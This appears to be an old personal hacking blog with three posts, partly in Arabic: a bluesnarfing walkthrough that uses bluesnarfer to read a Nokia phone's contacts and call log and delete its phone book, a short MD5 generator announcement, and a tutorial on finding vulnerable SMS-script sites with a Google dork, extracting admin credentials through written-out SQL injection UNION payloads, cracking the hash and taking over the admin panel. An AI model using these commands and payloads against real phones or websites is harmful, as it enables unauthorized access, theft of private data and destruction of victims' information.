:: Bluesnarfing nokia 6310i ::

Hi there

after getting a good Bluetooth Device that work excllent on linux 

i said why not trying the bluesnarfing with BackTrack 3

note i wrote this throw windows so the result not show :S

first to check the bluetooth device :

thedon# hciconfig 

the result show the device is down :S

so i make it up using

thedon# hciconfig up hci0

now lets search for any mobile 

thedon# hcitool scan hci0

scanning 

xx:Xx:xx:xx:xx   nokia the  don

after having the mac address lets hack it 

now to view the phone book 

thedon# bluesnarfer -r 1-50  -b Xx:xx:xx:XX

>>>>>>>

>>>>>>>

now to show recived call on a phone 

thedon# bluesnarfer -s RC -r 1-50 -b xx:xx:xx

where RC: is received call

to delete the phone book simply by 

thedon# bluesnarfer -w  1-50 -b xx:xx:xx

 

thats all and still tryng it  

having fun lo00olz  :D

November 29, 2008 Posted by eshbeata | :: Linux ::, :: S3curity :: | backtrack, bluesnarfing, bluetooth hacking | No Comments Yet

:: Md5 Genrator ::

برمجة :ThE_DoN

يقوم البرنامج بتوليد هاشات مشفره md5

طبعا كل ما تتخيل من كلمات وارقام وحروف

قريبا بنزل الرابط للتحميل

May 3, 2007 Posted by eshbeata | :: S3curity :: | | No Comments Yet

:: شرح ثغرة sms + فك تشفير باسورد MD5 ::

يا هلا والله اخوانيطبعا الثغرة موجوده ف كثر من المواقع وخاصة العربية

الثثغرة من اكتشاف اخوي Devil-00
الان لا اطيل عليكم نبدا الشرح

اول شي شفلك موقع في ثغرة الرسائل القصيرة

يعني مثلا كذا يكون الموقع

www.site.com/sms/

او في جوجل اكتب

inurl:/sms/index.php

وان شاء بتلقي مواقع
لقيتلي موقع

آخر الرسائل: لا تعلمني الهوى توي صغير لأ تمشيني علي درب الهلاك :: ahlen hayati ::

وهذي صورته

لاحظ انه صاحب الموقع وضع اسم الملف sms1

المهم

انا نضع الكود التالي ليجلب لنا اسم الادمن ^_^

cat.php?CatID=-1%20UNION%20select%20Title%20from%20cat%20where%20 id=-1%20UNION%20SELECT%20ModName%20FROM%20modretor

ليصبح رابط الموقع هكذا

http://www.site/sms1/cat.php?CatID=-1%20UNION%20select%20Title%20from%20cat%20where%20 id=-1%20UNION%20SELECT%20ModName%20FROM%20modretor

الان لاحظو الصورة

الان نضع الكود التالي لجلب الباسورد المشفر للادمن

cat.php?CatID=-1%20UNION%20select%20Title%20from%20cat%20where%20 id=-1%20UNION%20SELECT%20ModPassword%20FROM%20modretor

لاحظو الصور

الان اخذنا اليوزر والباسورد المشفر

الان نذهب الى الموقع الشهير لفك التشفير

[url]http://milw0rm.com/cracker/[/url]

الان اضغط مثل اللي في الصورة لاضافة الباسورد المشفر

االان ضع الباسورد كما هو موضع بالصورة واضغط على submit

طبعا انا تركته يوم واحد ورجعت اليوم الثاني لقيت الباسورد مفكوك بسرعة

الانن لمعرفة اذا تم فك تشفير الباسورد او لا تابع الخطوات التالية

الان ضع الباسوررد كما في الصورة واضغط على submit

مبروووووووك تم فك التشفير

الحين مبروك عليك الادمن روح على لوحة التحكم

روح على لوحة التحكم

www.site.com/sms1/admin/login.php

ضع اليوزر والباسورد الي فكيناه

انتظر لحظات

انت الادمن

سوي اللي تبيه

الحين بتقولي شو فايدتها

انا بعطيك ملاحظة :-

روح المنتدى وادخل باليوزر والباسورد يكن تلقاه نفس الشي وجرب في كل صفحة ادمن على اي مجلد او سكربت

انا تمكنت من رفع شل عن طريق سكربت معين

جميع الحقوق محفوظه ThE_DoN

تحياتي للجميع وان شاء الله يكون شرح مفيد للجميع

 

May 3, 2007 Posted by eshbeata | :: S3curity :: | | No Comments Yet